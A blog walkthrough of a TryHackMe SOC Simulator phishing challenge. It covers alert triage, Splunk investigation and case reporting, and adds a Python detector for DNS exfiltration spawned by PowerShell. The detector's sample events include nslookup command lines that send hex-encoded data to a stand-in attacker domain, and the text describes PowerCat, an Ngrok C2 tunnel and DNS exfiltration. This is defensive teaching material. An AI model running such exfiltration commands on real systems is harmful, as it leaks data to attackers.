This post introduces the TryHackMe SOC (Security Operations Center) Simulator, focusing on its real-world attack simulation capabilities. The tutorial walks through handling alerts, investigating cyberattacks, analyzing events, and writing case reports. This session covers the "Phishing Unfolding" challenge; further challenges are planned for later videos.

SOC Simulator

Documentation and Tools:

  • Scenario Overview: Detailed explanation of scenarios.
  • Tool Documentation: Overview of the tools provided, chiefly Splunk and the analyst VM.
  • Step-by-Step Guidance: Recommendations for analyzing incidents.
  • SOC Components:
    • SIEM (Splunk): Centralized log management and alert correlation.
    • Analyst Workstation: The VM from which the analyst reads alert emails and reaches the environment's systems.

Dashboard Overview:

  • Shows counts of total, open, and closed alerts, broken down by severity.
  • Visualization of alert types and priorities.

Alert Investigation Workflow:

  • Filter Alerts: Prioritize by severity (critical, high, medium, low).
  • Analysis Steps: Start with the critical alerts, read each alert's description, then pivot into Splunk to confirm the parent-child process relationship it reports.

SOC Incident Investigation Case Study

Example Incident Investigation:

  1. Alert Details:
    • Suspicious Parent-Child Relationship:
      • Parent Process: PowerShell.
      • Child Process: NSLookup performing DNS queries.
    • The queried names carried encoded subdomain labels, which is what made the alert suspicious.
  2. Analysis in Splunk:
    • Investigated process IDs and correlated events.
    • Identified a pattern of activity involving PowerShell.
  3. Uncovered Malicious Activity:
    • PowerShell was used to download PowerCat, a PowerShell implementation of netcat commonly used for reverse shells and file transfer.
    • A Command and Control (C2) channel was established through an Ngrok tunnel, so the traffic went to an Ngrok hostname rather than directly to the attacker's endpoint.
    • System enumeration, including mapping of shares holding financial records.
    • Data exfiltration via DNS queries, with the data encoded into subdomain labels of the attacker's domain.
  4. Case Report:
    • Documented findings:
      • Use of malicious tools.
      • Detailed attack sequence.
      • Recommendations: detection improvements and follow-up investigation of the attacker's domain.
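The parent-child pattern at the heart of this case (PowerShell spawning nslookup against encoded subdomains) can be turned into a repeatable check rather than something spotted by eye. The following is an added example, not code from the TryHackMe room or from the original post: a small Python detector that runs over constructed Sysmon Event ID 1 style process-creation records, flags nslookup processes whose parent is PowerShell and whose queried name carries a hex-looking or high-entropy label, and reassembles the hex chunks in sequence order to show what left the network. The field names, PIDs, the attacker-example.test domain and the hex payload are invented for the example; the entropy threshold and the assumption of a two-label apex domain are heuristics chosen here, not values from the room.

```python
import math
import re
from collections import Counter

# Constructed Sysmon Event ID 1 style records, reduced to the fields the check
# needs. PIDs, the attacker-example.test domain and the hex payload are invented
# for this example; they are not data from the TryHackMe room.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NSLOOKUP = r"C:\Windows\System32\nslookup.exe"
CMD = r"C:\Windows\System32\cmd.exe"

SAMPLE_EVENTS = [
    # Sequence-numbered hex chunks: the pattern described in the case study.
    {"pid": 4480, "parent_image": POWERSHELL, "image": NSLOOKUP,
     "cmdline": "nslookup 0.51335f706179726f.attacker-example.test"},
    {"pid": 4488, "parent_image": POWERSHELL, "image": NSLOOKUP,
     "cmdline": "nslookup 1.6c6c2e786c7378.attacker-example.test"},
    # PowerShell -> nslookup against an ordinary internal name: must not fire.
    {"pid": 4496, "parent_image": POWERSHELL, "image": NSLOOKUP,
     "cmdline": "nslookup fileserver01.corp.local"},
    # Encoded label but spawned from cmd.exe: outside this rule's parent filter.
    {"pid": 5120, "parent_image": CMD, "image": NSLOOKUP,
     "cmdline": "nslookup 51335f706179726f.attacker-example.test"},
]

HEX_LABEL = re.compile(r"^[0-9a-fA-F]{12,}$")
HOSTNAME = re.compile(r"^[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
ENTROPY_MIN_LEN = 16     # heuristic thresholds chosen for this example
ENTROPY_THRESHOLD = 3.5  # bits per character; plain words sit well below this


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def query_from_cmdline(cmdline):
    """Return the name an nslookup command line resolves, or None."""
    for tok in cmdline.split()[1:]:
        if tok.startswith("-"):      # skip options such as -type=txt
            continue
        if HOSTNAME.match(tok):
            return tok
    return None


def encoded_label(name):
    """Return the first subdomain label that looks like encoded data, or None.

    The last two labels are treated as the registrable domain (a simplifying
    assumption: real code would use a public-suffix list).
    """
    for label in name.split(".")[:-2]:
        if HEX_LABEL.match(label):
            return label
        if len(label) >= ENTROPY_MIN_LEN and shannon_entropy(label) >= ENTROPY_THRESHOLD:
            return label
    return None


def detect_dns_exfil(events):
    """Flag nslookup spawned by PowerShell whose queried name carries an encoded label."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("\\nslookup.exe"):
            continue
        if not ev["parent_image"].lower().endswith("\\powershell.exe"):
            continue
        name = query_from_cmdline(ev["cmdline"])
        if name is None:
            continue
        label = encoded_label(name)
        if label is None:
            continue
        first = name.split(".")[0]
        seq = int(first) if first.isdigit() else None   # leading counter label, if any
        findings.append({"pid": ev["pid"], "query": name, "seq": seq, "data": label})
    return findings


def reassemble(findings):
    """Decode hex chunks in sequence order; unnumbered or non-hex chunks are skipped."""
    numbered = [f for f in findings if f["seq"] is not None and HEX_LABEL.match(f["data"])]
    out = bytearray()
    for f in sorted(numbered, key=lambda f: f["seq"]):
        out += bytes.fromhex(f["data"])
    return bytes(out)


if __name__ == "__main__":
    hits = detect_dns_exfil(SAMPLE_EVENTS)
    for hit in hits:
        print(f"pid {hit['pid']}: {hit['query']} (chunk {hit['seq']})")
    print("reassembled:", reassemble(hits))
```

The cmd.exe record is left unflagged on purpose to show the scope of a parent-child rule: it catches the chain the alert describes but nothing else, so a production detection would also key on the query shape regardless of parent. In Splunk the first stage is the same filter over the Sysmon index on ParentImage and Image before pulling the queried name out of CommandLine; what the code adds is the second stage, decoding the chunks so the report can state what data actually left.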

Creating SOC Case Report

Report Submission:

  • The incident was classified as a "True Positive."
  • A case report was drafted and submitted through the SOC Simulator.

Simulator Exploration:

  • Users can revisit closed alerts and edit reports.
  • Upcoming features like playbooks are hinted at for future updates.

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
